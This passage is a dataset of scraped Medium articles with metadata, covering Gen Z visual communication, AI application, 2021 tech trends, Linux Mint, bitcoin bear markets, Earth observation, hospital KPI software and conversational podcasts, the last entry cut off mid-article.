Fluid production is not limited to genre-jumping and collective networks. In the hands of our very pragmatic Gen Zs, it also involves frankensteining mediums, and surfing between the multitude of written and visual materials. Having grown up on Twitter, Instagram, Snapchat, and YouTube, Gen Zs have been trained to say less with words and more with images. The question is, has the limited word count and one second per post attention span encouraged Gen Zs to abandon proper sentence structure in favor of memes, gifs, and images? And will this produce a more visually articulate generation? What will this mean as they move into the professional world, colliding with older generations, and discovering that communicating your ideas and arguments is the difference between professional success and failure? Or, will Gen Z change the game? Charlotte Force helps us navigate Gen Z’s visual/textual bilingualism and hopefully shed some light on what it might mean for the future of communication.
My generation came into the world a little after the Internet, around the same time as email. We came of age, however, with digital photography and smartphones. Saddled with a saturation of visual media unprecedented in history — with terabytes of storage and unlimited data plans for $60 a month — how could Gen Z do anything else but use it for the most mundane, ubiquitous, and complex of human functions: communication.
The expressive explosion of language use online has accelerated, or at least amplified, the process of language change. Writing has always been accompanied by images. They are almost like an additional language that we are all fluent in. You’d have much greater success communicating the idea of “flower” to a stranger by drawing, than by speaking or writing in a language they don’t understand. And images are subtle in a different way than words, or at least, are worth a thousand of them. Images, ultimately, are like a language because they are a way we communicate. Our textual-visual bilingualism creates endless subtlety in practice. Emojis and GIFs are a crucial part of the 21st century’s textual-visual era of language. Take the example of a humble, single emoji. It operates on many levels: the literal sense, like an apple emoji which can simply denote the fruit. But the figurative sense of an emoji is open for interpretation. I have spent non- trivial time analyzing the addition of a red heart to the end of an iMessage, or the placement of a smiley face, in the way that an academic might read between the lines of a poem.
More than a reduction of “proper” language, I see the pervasiveness of images in our communication as an actualization of our textual- visual bilingualism. Thanks to Google Photos, my emoji keyboard, the Bitmoji app, and Snapchat, I always have a shortcut to communicate both visually and textually. Gen Zs has native fluency in both means of communication. As with any native bilingualism, we can switch between means, or mix them naturally. In the same way that an expression can’t translate properly between French and English, the feeling evoked by a GIF can’t be translated into words.
With our fluency in text and images comes an awareness of when to use them, we experience the ambiguity of images day-to-day. We know exactly how abbreviations, like Twitter’s 140 character limit, reduce meaning; how distracted communication, like Snapchats that disappear after ten seconds, reduce attention span. But we operate on a basis of necessity — a 3:00 a.m. tweet about your zodiac sign doesn’t need to be your magnum opus. We don’t say less with words because of images. We choose what to say with words, and with images, and with a blend of both.
Being articulate in melding words and images has not taken away our ability to choose when we include images or abbreviate our ideas. We are constantly assessing the ambiguity of images, dealing in varied mediums of communication simultaneously, and sorting through reams of information. I think it’s made us creative, communicative, and adept multitaskers. If anything, I think the known benefits of bilingualism can be attributed to the textual-visual bilingualism of Gen Z. We know how to mode-switch between varying degrees of visual imaging when we communicate. I don’t use emojis in work emails, but I use a lot of smiley faces in texts to my friends — and sometimes it is fun to add a relevant New Yorker cartoon to the end of a class presentation. | https://medium.com/irregular-labs/communication-jpg-the-bilingualism-of-gen-z-12554e410fd | ['The Irregular Report Irregular Labs'] | 2019-05-03 20:27:23.233000+00:00 | ['Art', 'Fluidity', 'Photography', 'Technology', 'Social Media'] |
140 | The Problem With Artificial Intelligence Isn’t the Science, It’s the Application | Yeah, I’m gonna talk about War Games.
Artificial Intelligence gets a bad rap, and as someone who has spent the last decade applying AI, I totally understand why. The science of AI and machine learning is solid, defensible, and utterly useful. It’s how we’re applying that science that rarely makes any sense.
This isn’t a new phenomenon and it didn’t start with AI. We’re in the stage of the evolution of artificial intelligence in which the technology has surpassed our formerly rock-bottom expectations. When this happens, as has happened with other emerging technologies in the past, we start leapfrogging those expectations to cause two problems:
We produce dystopian stories of future state. In this case: The machines destroy us or rule us. We start looking to cash in by applying the new technology in the most haphazard ways possible.
Both of these outcomes are expected and ill-advised, so here’s what we do about them.
Our New Machine Overlords
I don’t want to talk too much about the dystopian future of AI, I just want to make sure we’re all on the same page about what AI really is so we can best figure out how to use it. That starts with making sure we all agree what it’s not.
Computers don’t think. Most of what you read about the machines rising up and deciding humanity must be wiped out is bunk. Everything a computer does is, ultimately, designed and programmed by a human. Self-consciousness is not an option, scientifically speaking. We don’t even know enough about our own self-consciousness to put the machine equation together. We’re guessing. This is why we create what seem like self-fulfilling prophecies of doom.
But keep in mind, this same stopgap measure — that machines must be programmed by humans — is also its own greatest weakness. This is what Elon Musk and his ilk are really worried about. We humans can surely design systems with enough automation and enough stupidity to produce some scary outcomes.
This is not a new concept. In fact, the now-ancient movie War Games nailed the stupid human scenario almost perfectly, when our military computer decided that the game against the Soviet military computer — the game that launches nuclear missiles and then the world blows up — needed to be finished. Ultimately our computer had to be taught that no one wins that game. With tic tac toe.
Oh. Spoiler alert. See it anyway. It still holds up.
But the real problem with that kind of doomsday scenario is much simpler (and less Hollywood blockbuster friendly). If we’re going to design nuclear launches controlled by computers, let’s make sure it takes two humans to LAUNCH the missiles, not require two humans to STOP the automated launch.
War Games did this. What would have blown up the world is that quick scene where one military launch key guy is pointing a gun at the other military launch key guy who was hesitating turning his launch key. If there’s an issue with that movie, it’s that that scene wasn’t explored, because the next three seconds of what those two humans do decide whether or not the movie takes a huge left turn and vaporizes us all.
And THAT, in an exaggerated nutshell, is the problem with how we’re applying AI today.
Well, again, it’s two problems:
Artificial Intelligence, Machine Learning, Automation, Chatbots, Alexa, all of it, is best applied, and probably only usefully applied, when we automate only those parts that can be perfectly automated. AI, ML, blah blah blah, is best SOLD as magic that can automate any task that any human can do, because humans are expensive and make mistakes.
Are we that far removed from “voicemail hell” that we’ve forgotten the pain of all-in automation?
We might be. I see those promises made all the time. You do too, in any Watson commercial.
Why Do We Replace Amy?
We attack our AI projects by trying to replace expensive, mistake-making humans, immediately and completely, with machines. I’ll give you a great example: AI scheduling assistants. Great idea, questionably executed.
Anyone who has tried to get two or more people in the same place at the same time has dealt with scheduling hell, having to go back and forth several times to nail down the exact time everyone can meet. The use case for automation here is totally valid and the solution is totally valuable. The science is also there, since most of our 9-to-5 is documented digitally and that calendar data is at least available, if not public.
It is super, super easy to write the script that can offer options, take requests, even prioritize some preferences, and slap a block of time on two digital calendars.
So why does this fail more often than it succeeds?
Because the expensive, mistake-making executive assistant wasn’t the problem. That part of the system wasn’t even expensive, nor mistake-making. In fact, I usually run into the same scheduling problems whether the executive assistant is a machine or a human.
Because the problem is actually the executive.
Well, again, it’s several problems. But here are the top three:
The executive rarely blocks off all the time on their calendars that needs to be blocked off. Unless it’s a dedicated meeting, it’s likely not on his or her calendar. And it never will be. There are too many moving parts around the executive. Schedules are documented but they change. Priorities are undocumented and they also change. Outliers rarely get programmed into the system. I once tried to have a conference call with someone overseas, and his AI assistant did not understand that I wasn’t interested in doing that call between 1:00 a.m. and 4:00 a.m. my time. Instead of giving me midnight or 5:00 a.m. as an option, it just kept pushing the same times farther out on the calendar.
Ten seconds to text my colleague, ten seconds for him to text me back. Problem solved. In fact, he was gracious enough to schedule for 6:00 a.m. my time.
It’s the Human (Dummy)
The missing piece is what I usually refer to as logic engineering or decision design around a complex system. Neither of these concepts are new, but they take on a new relevance when applied to AI, tackling some of the same stuff that happened with web, mobile, etc:
AI (and so on) is a new science. The people with all the AI science experience have little, if any, application experience. The people with the application and business experience might be either dismissive or fearful of the science, or they just don’t have the time to understand it.
This is why teenage Matthew Broderick had to train the military war computer not to blow up the world while old-ass Professor Falken had to stand behind him, providing guidance and smiling smugly while the world was seconds away from blowing up.
OK, parts of the movie don’t hold up.
Especially when you think about the fact that Professor Falken should have coded for that contingency in the first place (see the scheduling-bot outlier problem above) or at the very least NOT AUTOMATED that part of the process.
This wisdom gap is only one possible reason for skipping the logic and decision engineering stage, resulting in AI application failure. There are tons of others. Money is another one. FOMO is another one. Malfeasance. Ignorance. And on and on. Oddly enough, it’s the same kind of tug of war happening around blockchain and Bitcoin, with just as many misunderstandings and myths, and two very distinct, very dug-in sides on either side of viability.
My point is, whether it’s Global Thermonuclear War or grabbing coffee with a colleague, there’s a new science here in decision and logic engineering, one that’s playing catch-up in the AI world. It’s around the application. It’s not in whether we automate, but where and how we choose to automate.
Automation, AI, ML, data science, the best of it will always involve the 80/20 rule, and you can invoke that rule all over the place. Systems should be 80% automated, 20% human. The path to get there should start with the reverse and work its way through the most complex problems first. Subsystems should be analyzed as 80% automatable, 20% non. Viability rules should be 80% norm, 20% outlier.
Those numbers aren’t exact and the lines of division are always moving, but that’s the beginning of logic engineering. When we forget to approach AI solutions with those types of application breakdowns in mind, that’s when we get dystopian (or stupid) outcomes.
So how do we stop the stupid outcomes? We develop sound AI implementation strategy that bridges the gap between the science and application. Read more in my next post: Understanding How To Implement an AI Strategy. | https://jproco.medium.com/the-problem-with-artificial-intelligence-isnt-the-science-it-s-the-application-3c640a1bbecf | ['Joe Procopio'] | 2018-07-25 16:23:25.266000+00:00 | ['Entrepreneurship', 'Artificial Intelligence', 'Machine Learning', 'Technology', 'Startup'] |
141 | TECH PREDICTION for 2021 | It goes without saying that 2020 was the most disruptive year in the past decade or more. 2020 literally forced new migrations, not only for consumers but also for global businesses.
ONE OF THE BIGGEST is the MIGRATION of employees from their office cubical to their home desk.
Businesses had to quickly adapt and implement security and logistic measures, performance-tracking systems, new server infrastructures that allow employees to access internal data securely from outside the office, and more.
This may seem a simple process but depending on the size of the organization and the flexibility of their internal systems (digitalized/non-digitalized), many businesses simply couldn’t cope with this immediate need for change and had to close shop, leaving many employees without a job.
Some that were already fully digitalized, flourished, and announced work from home permanent post-COVID, for example, Twitter and Dropbox.
This movement paved the way to the SECOND MIGRATION. ENTREPRENEURSHIP.
While some people immediately began looking for companies that have a fully digitalized framework and job opportunities, others have seen this as an opportunity to launch their own business, a lot of them flocking towards eCommerce/eServices.
The common denominator in 2021 will be DIGITAL TRANSFORMATION.
Businesses will need to start or continue the process of being omnipresent online, both from an organizational standpoint and for their customers.
A successful digital transformation strategy must include:
Customer Experience, Data & Insights, Strategy & Leadership, Technology, Operations, Culture & People, Organization, Marketing, Cybersecurity, and Brand Management.
Transformation is different for every company and sadly, many digital transformations fail. For some businesses, the disruption may be so great that their long-term strategic vision will need to be overhauled. Any digital transformation roadmap that does not offer added value to the user will need to be reimagined.
With 2021 just around the corner, here are 5 topics in Tech & Digital Transformation that are worth keeping an eye out for.
AI Chatbots
If you’ve chatted with any retailer online in the past months, chances are, you’ve spoken to an AI-powered chatbot.
AI fed with data scraped from real conversations, combined with NLP gives a rather scary result, human-like conversations, that can be text-only and, even Voice enabled.
Some of the benefits Voice AI can bring to businesses are:
- Zero wait time, 24/7 instant availability
- enhanced customer insights
- better two-way interaction
- increased productivity
- fraud detection
- & more.
It is expected that more companies will want to automate customer experience processes with AI-powered chatbots rather than scripted chatbots.
Not only that, but we will see chatbots participating in the sales funnel, providing relevant, personalized recommendations.
My guess is if you’re looking to stay on top of the game in 2021, implementing AI-powered chatbots for your business is one crucial step for you to take.
2. Advanced Data Analytics -Data Quality Management to Become More Prominent
Following an unpredictable 2020 and global pandemic, using analytics in the wake of innovation and digital transformation globally is not just a recommendation but a must.
Managing data quality doesn’t just revolve around having high-quality data to stack and analyze. It implies cleaning and preparing data, distributing it across your organization (remote workers included), managing the data, and, ultimately, examining it with the inclusion of AI, RPA, and more and adopting relevant business decisions.
Data Analytics providers are already developing new infrastructures “DaaS” services to help businesses reconfigure their business processes, and what better way to do so than AI and Cloud Computing.
DaaS: Data as a Service will be more prevalent, as businesses will have more visibility into AI, and cloud systems will reconfigure their products and services to accommodate the ever-growing demand.
Want to learn more about how Data Analytics can help your business? Reach out and ask specific use cases & demos directly.
3. Hyperautomation
Hyperautomation brings together different technologies to undertake end-to-end automation of an organization’s complex business processes, including operations where subject matter experts were once required, under a unified and intelligent system.
Known as the core enabling technology of Hyperautomation, RPA enriched by AI and ML expands its capability in process discovery, empowering businesses to drive an unprecedented scale of automation while maintaining governance and data security.
What are the benefits of Hyperautomation?
Hyperautomation provides a more precise overview of structured and unstructured data from various business applications and operations.
This way, businesses can make better-informed decisions based on the data gathered and analyzed by automation systems, enable employees to cooperate with robots towards a full cycle of automation at a big scale, from discovering automation opportunities to measuring the ROI.
4. Digital Marketing — Image and video SEO for visual searches
As more and more users discover visual search techniques, the overall landscape of SEO will diversify along with it, spanning into Voice, Image, and Video Search. With the introduction of the AR lens (Google Lens, Snapchat’s Spectacles & more) your business can capitalize on this new trend and be within the 1st in their line of business with an established presence in each trend.
What is Visual Search?
Simply put, visual search is a search algorithm that uses real-world images as a stimulus for the online search.
The top 3 visual search engines right now are Google, Amazon, and Pinterest.
While major retailers have already grasped the power of Visual Search, it’s as important for any type of business to take advance of this trend.
Why is Visual Search important?
Here are a few facts:
* 90% of the information transmitted to the human brain is visual. (MIT)
* 13 milliseconds. The time it takes for the human brain to process an image.
* Images have an interaction rate of 87%, compared to 4% or less for other types of posts, such as links or text in Social Networks.
Here are the basics you can apply to your current SEO strategy:
Always include alt text in your image descriptions, which crawlers use to classify images.
Create a dedicated sitemap or add images to your existing sitemap, where they are even easier to crawl by search engines.
Include targeted keywords in your image file name.
Use quality images and videos, minimum HD.
5. Voice UI
The growing use of voice search started with the 1st digital voice assistant implemented in a smartphone.
Due to the development of IoT, 2021 will bring an unprecedented increase in Voice Search, not just from mobile devices but from smart speakers, smart TVs, smart displays, and other household or carry-on devices.
Furthermore, we can expect smart assistants to become more proactive, including delivering personalized recommendations to different users.
The voice and speech recognition market is expected to grow at a 17.2% compound annualized rate to reach $26.8 billion by 2025.
As voice recognition continues to improve, and usage of voice assistants like Alexa, Cortana, Siri, and Google continues to grow, it will become even more challenging to stay ahead of your competitors.
It’s a good idea to learn how your business can rise on top of this trend and be prepared.
Read more about how you can implement a diversified voice search raking strategy for the main voice search engines here.
These are only 5 of the most important changes Technology will bring in 2021.
It’s incumbent on you to figure out which technologies can benefit your business and stay ahead of your competition.
Find more great articles and resources on Dokalink.com | https://medium.com/@darkanalytica/tech-prediction-for-2021-89e5b7c318cb | ['Leonard Dumitru'] | 2020-12-24 11:30:22.183000+00:00 | ['Marketing', 'Digital Transformation', 'Trends', 'Technology', '2021 Technology Trends'] |
142 | I’m giving Linux Mint a try after abandoning Ubuntu earlier this year. | I’m giving Linux Mint a try after abandoning Ubuntu earlier this year. Toward the end of last year, I recycled an old laptop into an Ubuntu machine to play around with .NET Core and Docker in Linux, and I was very impressed. It had been a long time since I’d last touched Linux, and for the most part everything worked right out of the box.
Hardship began when I tried to use it for virtual school in Fall 2020. It was wildly frustrating to not have feature parity with Linux variants of apps like Zoom while teachers were instructing to do specific actions that weren’t available.
The real deal-breaker was printing, though. I spent a day trying and just couldn’t get it working, so I rolled back to Windows. Imagine my delight when the first thing I saw upon logging in with Mint was “adding printer.” How wonderful! | https://medium.com/@adamprescott/im-giving-linux-mint-a-try-after-abandoning-ubuntu-earlier-this-year-d806f5eb01ea | ['Adam Prescott'] | 2020-12-24 00:50:26.721000+00:00 | ['Work', 'Technology', 'Productivity', 'Linux', 'Programming'] |
143 | When is the next bitcoin bull run? | When is the next bitcoin bull run?
A reflection for the bulls in a bear market
Photo by Andre Francois on Unsplash
I love the fact that certain concepts can be expressed clearly in one word. I like the word ‘perspective’ so much. Perspective is so important in today’s world, especially when we consider the new trend of decentralization. Every decision is based on mental judgment and mental judgment is based on perspective. Everyone claims to be right and their claim is based on information. The information doesn’t have to be false for the judgment to be wrong. Bitcoin is below $7k, it’s time to make fundamentalists of speculators.
When bitcoin went down to $6k earlier in the year and then got back to $8k, many thought they had seen the worst. But then, it struggled to stay over $9k. And as of writing, it’s back on the $6k level. This level seems unfair to traders (or speculators) who bought in at $12k (and above). Of course, I got in too during those periods but it wasn’t fomo. I was going to get in during that time regardless of the price (just as I am still going in right now at the $6k range). Cryptocurrency, from my perspective, remains a thing of the future. Yes, we are already seeing the reality but the development and full adoption will be slower than many first thought.
In the calmness and quietness that comes with the bear market, I decided to search some insights and look through perspectives I have not paid attention to. This is not the first bear market in crypto. What happened during the previous bear markets and what was the market trend?
It began in November 2013. Bitcoin price was about $1.2k. An all time high at that time. And then the plunge began. First the Mt. Gox issue started as a rumour, but then it became confirmed and a reality. The price of bitcoin sank to $600. And then continued into the abyss in the following weeks and months. At one point, it was as low as $110. Think about it; something that was once worth $1,200 now became $110. That’s more than a 90% drop! How bad has it gotten in 2018? $20k at all time high to $6k (which is the lowest so far, I believe). That is still a drop of 70%. Am I saying you should be grateful that things are not worse? No! I am just giving you some perspectives here.
The other point that really got my attention was the period of time the value of bitcoin stayed below it’s all time high after the $1,200 at November 2013. Throughout 2014, it was gloomy. There was no much uptick in 2015. Bitcoin started gathering momentum again in 2016. The all time high of 2013 was reached again in March of 2017. That is 4 good years. Of course, the price roamed as high as $750 during this 4 year period, but it was not convincingly over that price. So, if you bought the top in November 2013, you had to wait till March 2017 to break even.
If we mirror this event of November 2013 to March 2017 over what the market is experiencing in 2018, you will get a classical perspective to this bear market. Yes, the market is definitely larger than it was 4–5 years ago, but the fundamentals remain the same. I don’t think the drop will be up to 90% (I think 70% is fair enough) but it could drop lower. One thing I am certain of is that this bear market is not ending anytime soon. If it took about 40 months to get back to the all time high in the previous bear market, it might take at least a quarter of that for this market to get back at the level we all cheered about. Personally, I have set my mind to January 2019. Not necessarily to see bitcoin at $20k, but to see the bulls take over fully. It could take longer, but this bear market shouldn’t last up to 20 months.
This is the time for the hype to die down and real information to gain more ground. There is blood on the streets, so it is definitely a good time to buy. However, it matters what you buy. I am definitely not selling any serious stakes in my crypto assets for now. And I can hold on for as long as I want. That is the real definition of ‘money you can afford to lose’. In the real sense of it, nobody has money they want to throw away. But if you have to sell in 6 months or less, you are not playing smart.
The key to winning in trading and investing is to buy low and sell high. If you can’t wait for forever, you will buy high and sell low. The last time it was 4 years, let’s hope it’s below 2 years (or much less) before $20k again. Just to keep in perspective, we are still 4 months in on this bear market. Brace up!
P.S. You can connect with me on Twitter here | https://medium.com/hackernoon/when-is-the-next-bitcoin-bull-run-2fcbe1c54131 | ['David O.'] | 2018-06-25 07:21:01.153000+00:00 | ['Cryptocurrency', 'Bitcoin', 'Blockchain', 'Tech', 'Technology'] |
144 | The stage of maturity — Earth observation in a new era of space exploration | “The maturing space industry is evident with players in both private and public sectors accelerating the recent advances in science and technology that makes operating in space more viable for commercial and research interests.”
Space commerce is enjoying a renaissance period mainly due to technological advances that have dramatically decreased cost and increased data and related services. A $17+ billion market (and growing), today’s space industry is on the verge of entering maturity — the stage of self-discovery, boldness, and adventure.
The maturing space industry is evident with players in both private and public sectors accelerating the recent advances in science and technology that makes operating in space more viable for commercial and research interests. This year thus far, the European Space Agency (ESA) tested its new 3D printed rocket thrust chamber to help design more efficient rocket engines. Almost at the same time, Orbex, a commercial British space company, unveiled the world’s largest 3D printed rocket engine that is lighter, fuel efficient, and expected to launch in two years. ESA and the UK Space Agency also recently examined preliminary designs of the world’s first air-breathing rocket engines that, if valid, will also reduce weight in exchange for more payloads. There is of course also SpaceX’s reusable rocket technology that successfully launched its Falcon Heavy in late 2018 with a payload of 64 satellites, and plans to launch its Big Falcon Rocket that will carry a heavier payload later this year. Seattle-based satellite design and manufacturing company, LeoStella, inaugurated its smallsat design factory signifying market opportunities. The Australian National University releases research results showing that 2D materials can withstand space’s harsh environment. The materials can enhance space instruments. Facebook is designing space laser communication satellites to provide internet access widely, while Amazon Web Services (AWS) commenced its Ground Stations satellite data collection services, allowing for faster and cheaper data processing. These innovations in space hardware and services are a game changer for the entire industry.
“. . . more non-traditional players are entering the field.”
A microcosm of the overall space industry trend, Earth observation — that is, the collection of information about Earth — is subsequently entering a new era as indicative of activities in the first quarter of 2019, including predictions on its commercial viability, that the sector will become conventional in the UK within a decade, and its emerging market in Europe. Moreover, more non-traditional players are entering the field.
Argentinian private firm, Satellogic, announced its plans to map the Earth at 1-meter resolution weekly and signed a launch agreement with China Great Wall Industry Corporation to launch a constellation of 90 satellites. With a U.S. $72 million grant from China, Egypt’s high-resolution EO satellite launched with success. In the meantime, earlier launched satellites are now providing data.
China’s National Space Administration successfully tested two EO satellites that provided information on air pollution and data that can monitor agriculture and crop yield. Both satellites launched in 2018. The Argentina Space Agency’s synthetic aperture radar satellites, which launched in October 2018 to examine Earth’s soil moisture and surface deformation, released its first images to the public. ESA released data on methane and ozone in Earth’s lower atmosphere from its Sentinel-5 satellite that launched in 2017.
Other data providers are moving data to the cloud. The United States Geological Survey made its Lidar data over the US available as a public dataset via AWS. NASA’s Earth Observing System Data and Information System (EOSDIS) is gradually moving its data to AWS. The move counterbalances the growth in data and the resulting difficulties for distributing and analyzing the data.
“Billions of image pixels recorded by the Copernicus Sentinel-2 mission have been used to generate a high-resolution map of land-cover dynamics across Earth’s landmasses.” credit: ESA
EO applications revealed exciting results and project ideas, from aiming to generate off-grid electricity for remote communities in Nigeria, global assessment of land degradation, and, measuring the height of Earth’s surfaces in detail and the loss of ice in glaciers. Last, but not least, are the improvements in computational science for satellite imagery processing. Using artificial intelligence (AI) and machine learning, ESA unveiled a global high-resolution land cover dynamics map that shows how vegetation and land productivity change through the year. Scientists are also using machine learning and surface deformation data to predict earthquakes. Radiant Earth Foundation announced its plans to be the catalyst for democratizing machine learning applications through ML Hub Earth commons, while the Rockefeller Foundation invested in Atlas AI that will use machine learning and “ground truth data to estimate economic activity and crop yield from satellite imagery.”
Inroads are also made with the SpatioTemporal Asset Catalogs (STAC) that allows users to search for imagery and other assets across multiple providers, and Analysis Ready Data (ARD) to make U.S. Landsat archive data more “straightforward to use.”
As exemplified by this first quarter of 2019, this is an exciting time for the Earth observation marketplace — and we look forward to providing you updates on how the market continues to change. | https://medium.com/radiant-earth-insights/the-stage-of-maturity-earth-observation-in-a-new-era-of-space-exploration-26f4e57941b8 | ['Radiant Earth Foundation'] | 2019-04-01 11:01:01.450000+00:00 | ['Spacex', 'Space Exploration', 'Satellite Technology', 'Machine Learning', 'Earth Observation'] |
145 | Raise Your Hospital KPIs with a Focus on Cause and Effect Relationships | Healthcare organizations depend on monthly reporting of key performance indicators (KPIs) to measure financial performance and operational efficiency. As a result of the pandemic, almost all health executives expect a decline in revenue, so keeping a finger on the pulse KPIs may be more critical than ever before.
Credit: Fullvector/Freepik
Analytic dashboards are commonly used to track performance between monthly KPI reporting — but like monthly reporting, the activity analyzed has already happened, and the opportunity to avoid situations that adversely affect KPIs, such as denials, has passed.
The key to keeping KPIs strong and cash flowing is to avoid situations that inflate days in A/R, denials, write-offs, and decrease net collections. Unfortunately, even after substantial time and effort have been invested in identifying the root cause of situations that result in KPI disruptions, often the solutions are not permanent, and the same issues crop up time and again. The answer to maintaining healthy KPIs is pinpointing and lastingly correcting the situational causes that later affect RCM outcomes — the question almost all facilities face is how?
Identify root causes
A combination of experience, historical reporting, and automated analytic technology can get to the heart of operational deficiencies that cause negative financial performance. There can be many reasons for weak KPIs, but some of the most common causes include:
Days in A/R KPI factors
Slow claims submissions
High denial rates
Delayed payment posting
Claims denial KPI factors
Unsolved technology issues
Inaccurate or incomplete eligibility and insurance verification
Outdated rules engines
Write-off KPI factors
Fatal denials
Incorrectly applied adjustments
Timely issues
Net collections KPI factors
Outdated fee schedules
Failure to collect patient payments
Under or over coding
All situations leading to poor performance begin with data points that are eventually brought together on claims. Some circumstances that cause claims problems can be solved using existing technology; for example, most EHR systems will not let staff book an appointment until all relevant information (data) is recorded. Therefore, if birth dates are consistently missing from patient records, the platform can be set to lock until a birthdate is set. However, persistent RCM issues usually have an element that is much harder to control, for example, authorization denials because of an existing technology glitch or under coding due to inadequate documentation. These problems often need solutions that reach across departments and platforms. Up until now, a lack of communication between systems and siloed information has made permanent solutions impossible.
Reach across your enterprise to correct root causes at the source
Fortunately, there is a solution that can reach across disparate systems and facilities and alert staff when there is a data point that could later lead to operational or performance issues — healthcare business assurance.
Healthcare Business Assurance technology is a proactive solution that provides a permanent fix to RCM issues — wherever they originate. It is layered on top of existing technology and triggers an alarm to alert staff to problematic data. Since alerts happen in real-time, corrections can be made immediately before a claim is generated.
The problem: Decreasing net collections
For example, a large hospital system was continually hearing complaints from providers about under-compensation and saw a worrying trend towards declining revenue. After investigation, the group recognized two leading root causes of inaccurate coding leading to low RVUs and subsequent revenue leakage:
Problematic documentation from providers resulting in under coding and low RVUs
Failure to prove medical necessity
The solution: Proactive correction of root causes
Like many RCM issues, the solution needed a multi-pronged approach to reach across systems and departments. Hospital staff quickly realized BA technology was ideal for providing oversight of operations and providing lasting corrections. The team placed strategic alarms to instantly flag problematic data, allowing staff to correct issues before claim generation.
Solved: Inadequate documentation and inaccurate coding
One primary source of revenue leakage involved transcatheter aortic valve implementation (TAVI) coding. The solution involved multi-tiered alarms placed on the EHR and coding applications that virtually eliminated the circumstances ultimately leading to low net collections. Alerts allowed staff to be aware of and correct scenarios before claims were generated — accelerating overall collections and providing the information needed for accurate coding. Scenarios that triggered alarms included:
Missing fields in provider notes
Lack of terminology in notes to prove medical necessity and align with NCDs and LCDs
Lack of detail in notes to justify accurate procedure coding
Coding anomalies involving coding conventions such as NCCI edits, MEUs, and add-on codes
After correcting documentation and coding, RVUs reflected work done and raised net collections. (In many cases, the top 15–40 codes can drive up to 90% of revenue.) Then, alerts were placed on the RCM analytics platform to indicate when a provider deviated from expected RVUs as determined by historical data and compared with other providers performing the same procedures. In a noticeably short amount of time, providers had confidence in their compensation or (through education triggered by alerts) understood the documentation changes needed to ensure they captured the information necessary for accurate coding.
A permanent solution
Continual, automated monitoring and reporting ensure inefficiencies are permanently corrected. In the event an alert is triggered, a customized, integrated case-management workflow tool ensures timely follow-up that protects RCM outcomes. Flexible business rules engines can accommodate an unlimited number of triggers, alarms and automated case-management workflows, allowing organizations to build upon improvements and create lasting change.
Boost your hospital KPIs and increase overall provider and patient satisfaction
Organizations that concentrate on permanent solutions to circumstances that adversely impact KPIs will regain control of financial performance, ensure a steady stream of revenue, and benefit from a smoother revenue cycle experience that raises both staff and patient satisfaction.
For more on how Effy Healthcare can help you eliminate the root causes of underperforming KPIs visit www.effyhealthcare.com or contact us through [email protected]. | https://medium.com/@effyhealthcare/raise-your-hospital-kpis-with-a-focus-on-cause-and-effect-relationships-5fe08f4ef88c | ['Ana Elias'] | 2020-12-18 11:13:27.623000+00:00 | ['Healthcare', 'Performance', 'Technology', 'Kpi', 'Bi Dashboards'] |
146 | Listening to Podcasts at Oxford in 1374 and Kansas in 1974 | Why do we love those conversational podcasts?
Photo by NeONBRAND on Unsplash
If you were a student at a medieval university, you listened to lectures.
And listened and listened and listened to lectures, often more than ten hours a day.
But they weren’t like lectures at today’s universities, where hundreds of students sit in a hall and listen to a professor deliver a monologue.
The medieval morning lectures were like that, but come afternoon, the lectures morphed into dialogue. The professor would assert a position, a graduate assistant would field questions or objections posed by undergraduates, and discussion ensued. At the end, the professor would summarize that afternoon’s conversation.
It was the “Scholastic disputation.”
Each session was meant to unfold knowledge gradually, as informed and inquisitive minds rubbed against one another, sharpening each other in the process, like knives rubbing against a whetstone.
Kansas: Early 1970s
The disputation, like everything else Scholastic, evaporated over the centuries and gave way to the mass lecture hall, with one professor doing all the talking.
In the 1970s, three professors at the University of Kansas brought back the disputation.
The three professors were John Senior, Frank Nelick, and Dennis Quinn, and they led the Integrated Humanities Program, a program dedicated to the wild notion of restoring a sense of beauty and poetic knowledge in its students.
The Program had a lot of facets (e.g., waltzes, star-gazing, great books), but its centerpiece may have been conversations among the three professors with the students watching.
The following description of these highly-popular sessions is taken from Fr. Francis Bethel’s John Senior and the Restoration of Realism.
The 80-minute classes were neither planned nor rehearsed. They weren’t even mentally prepared beforehand. Said Quinn in an interview:
We didn’t plan the lectures. We had lunch together before class started and on the way over to class I’d say, ‘Well, what are we going to talk about?’ and they’d say, ‘I don’t know. What book are we reading?”
The conversational style captivated the students. The professors had a solid command of the subjects and could easily speak extemporaneously about them. When one spoke, the other two were stimulated to respond: back and forth for eighty minutes.
The harmony was remarkable, with never a false note — no interruption, no impatience, not even noticeable disagreements. Here were three friends who enjoyed looking at beautiful things together and helping students discover them. The class was something like a Socratic dialogue in that it rose from the sensible to the spiritual, with each of the three men contributing his insights.
Another faculty member called it an “intellectual drama.”
Students weren’t allowed to take notes (it would hamper listening). Students left the classes “enthralled” and often lingered and mused among themselves: continuing the conversation about the great subjects.
The conversations on weighty subjects were always accompanied by a lot of laughter. One former student recalled, “merriment could suddenly turn into the deeply profound; a vision of things where sadness and joy lay down together in meaning.”
The postmodern rise of conversation
Unfortunately, the Integrated Humanities Program (which was Catholic to the core, albeit only impliedly) ran into conflict with the secularists at the University of Kansas and it was choked out of existence.
But its conversational mode of learning made a comeback in March 2006.
That’s when Russ Roberts launched the Econtalk podcast. It wasn’t the first podcast to feature a guest format, but it was one of the first (podcasts didn’t catch hold until late 2004) and the only one I know of from 2006 that featured learned professors chatting about weighty subjects in a light-hearted atmosphere.
It proved remarkably successful. Today, many podcasts feature long, free-wheeling conversations. The Joe Rogan Experience is the most notable example.
And just like the Scholastic disputation and the Integrated Humanities Program, the conversational podcast has become remarkably popular.
It turns out that there’s “something about” the conversational approach to learning.
Four possible reasons we love conversational podcasts
They’re genuine
The podcast conversation is rarely an interview.
Interviews are boring: they’re fabricated.
The interviewer often sends the guests the questions ahead of time or they agree on what questions, in general, will be asked. It’s all planned out. The only time it gets interesting is if one of the participants goes off-script.
It’s also one-sided: Only the guest is supposed to provide information.
A conversation isn’t any of that. It’s mostly spontaneous, with genuine give-and-take, with both parties providing their opinions and information.
The conversational podcast is more “authentic.” I loathe that word (there’s nothing more inauthentic than being concerned about what is authentic), but it’s apt. The conversational podcast is genuine. It normally features amicable acquaintances discussing various topics, just like two friends might in a coffee shop. It’s pleasant: “joy tainted,” even, often giving way to mirth, like the Integrated Humanities Program classes.
We think in dialogue
I also think the conversational approach better captures how we think. Discursive reasoning is dialogic. When we think about a problem, it often takes the form of imaginary discourse: arguments, debates, discussions in our head with a “phantom other.”
How much better when the phantom other is an actual, live, unpredictable person?
Conversations are integrated
